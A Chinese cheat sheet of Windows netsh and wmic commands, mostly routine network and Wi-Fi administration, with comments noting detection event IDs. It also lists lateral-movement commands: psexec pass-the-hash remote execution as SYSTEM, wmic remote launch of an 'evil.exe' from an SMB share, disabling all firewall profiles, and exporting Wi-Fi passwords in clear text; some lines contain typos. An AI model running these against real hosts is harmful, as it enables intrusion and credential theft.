# 修改對應網卡的獲取IP的形式,如改為dhcp
netsh interface ipv4 set address name="以太網" source=dhcp
# 修改對應網卡的獲取IP的形式,如改為static 並設置相關的ip gateway netmask dns等
netsh interface ipv4 set address name="以太網" source=static addr=192.168.1.100 mask=255.255.255.0 gateway=192.168.1.1
netsh interface ip set address name="以太網" source=static addr=192.168.1.100 mask=255.255.255.0 gateway=192.168.1.1 gwmetric=0
或者:
netsh interface ip set address name="以太網" static 192.168.1.100 255.255.255.0 192.168.1.1 1
# 主DNS
netsh interface ipv4 set dns name="以太網" source=static addr=114.114.114.114 register=PRIMARY
或
netsh interface ipv4 set dns name="以太網" static 114.114.114.114
# 主輔DNS
netsh interface ipv4 set dns name="以太網" static 114.114.114.114 114.114.115.115 both
或單獨輔DNS
netsh interface ip add dns name="以太網" 114.114.115.115 index = 2
# 如果您的PC已配置為使用DHCP,則希望將適配器配置為使用DHCP中的DNS,並運行以下命令
netsh interface ip set dnsservers name="以太網" source = dhcp
# 關閉當前配置的防火牆
netsh advfirewall set currentprofile state off
# 關閉所有配置文件(域、專用、公用)的防火牆;恢復時將 off 改為 on
netsh advfirewall set allprofiles state off
# 本機windows端口轉發(可用 netsh interface portproxy show all 查看當前已有的轉發規則)
啟用轉發
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=192.168.1.100 connectport=4000 connectaddress=192.168.1.120
停止轉發
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=192.168.1.100
# 列舉用戶登錄次數 模糊搜索管理員用戶
wmic netlogin where (name like "%administrator%") get numberoflogons
# 以system權限來執行遠程命令(IP是遠程的IP地址)。PsExec 默認會在目標主機上安裝名為 PSEXESVC 的服務,防守方可通過系統日誌中的服務安裝事件(事件ID 7045)以及對 ADMIN$ 共享的寫入來發現此類操作
psexec /accepteula \ip -s md.exe
# 利用用戶hash來登錄遠程主機並執行命令(IP是遠程的IP地址)。此類登錄在目標主機上表現為使用 NTLM 的網絡登錄(安全日誌事件ID 4624,登錄類型 3);限制本地管理員賬戶的遠程使用、為每台主機設置不同的本地管理員密碼可降低風險
psexec /acceptula \ip -u Domain\\user -p LM:NTLM cmd.exe /c dir c:\
# 使用用戶名密碼通過smb來執行遠程主機上的命令或者文件。注意密碼以明文出現在命令行中,若啟用了進程命令行審計(事件ID 4688)會被記錄;由 WMI 遠程創建的進程其父進程為 WmiPrvSE.exe,可作為檢測依據
wmic /node: targetiP /user:domain\\user /password:password process call create "\ smbiP \share\evil.exe"
# 卸載軟件
wmic product get name /value # 獲取軟件名稱
wmic product where name="11XXX" call uninstall /nointeractive
# 判定遠程登錄用戶
wmic /node:remotecomputer computersystem get username
# 實時獲取遠程主機進程
wmic /node:machinename process list brief /every:1
# 開啟遠程rdp
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where AllowTSConnections="O" call SetAllowTSConnections "1"
# 重置 Winsock 目錄
netsh winsock reset
netsh語法
netsh[ -a AliasFile] [ -c Context ] [-r RemoteComputer] [ -u [ DomainName\ ] UserName ] [ -p Password | *] [{NetshCommand | -f ScriptFile}]
說明:https://docs.microsoft.com/zh-cn/windows-server/networking/technologies/netsh/netsh-contexts
# 網絡設置的備份與恢復
備份操作: netsh dump >bak18.txt
恢復操作: netsh exec bak18.txt
# 用命令改IP,如下
C:/>netsh (進入設置模式)
netsh>interface
interface>ip
interface ip>set address "本地連接" static 10.1.1.111 255.255.255.0 10.1.1.254
interface ip>exit
# 導出已有配置文件
netsh wlan export profile key=clear(key=clear 表示將Wi-Fi密碼以明文寫入導出的XML配置文件,導出後應妥善保管或及時刪除該文件)
# 常用的netsh wlan命令
列出配置文件:netsh wlan show profile
導出配置文件:netsh wlan export profile key=clear
刪除配置文件:netsh wlan delete profile name=""
添加配置文件:netsh wlan add profile filename=""
連接wifi:netsh wlan connect name=""
列出接口:netsh wlan show interface
開啟接口:netsh interface set interface "Interface Name" enabled
列出所有可連接wifi詳細信息:netsh wlan show networks mode=bssid
# 開啟和禁用(wlan0和eth0代表網卡的名稱)
禁用無線網卡:netsh interface set interface wlan0 disabled
啟用無線網卡:netsh interface set interface wlan0 enabled
禁用有線網卡:netsh interface set interface eth0 disabled
啟用有線網卡:netsh interface set interface eth0 enabled
更詳細的請查看命令幫助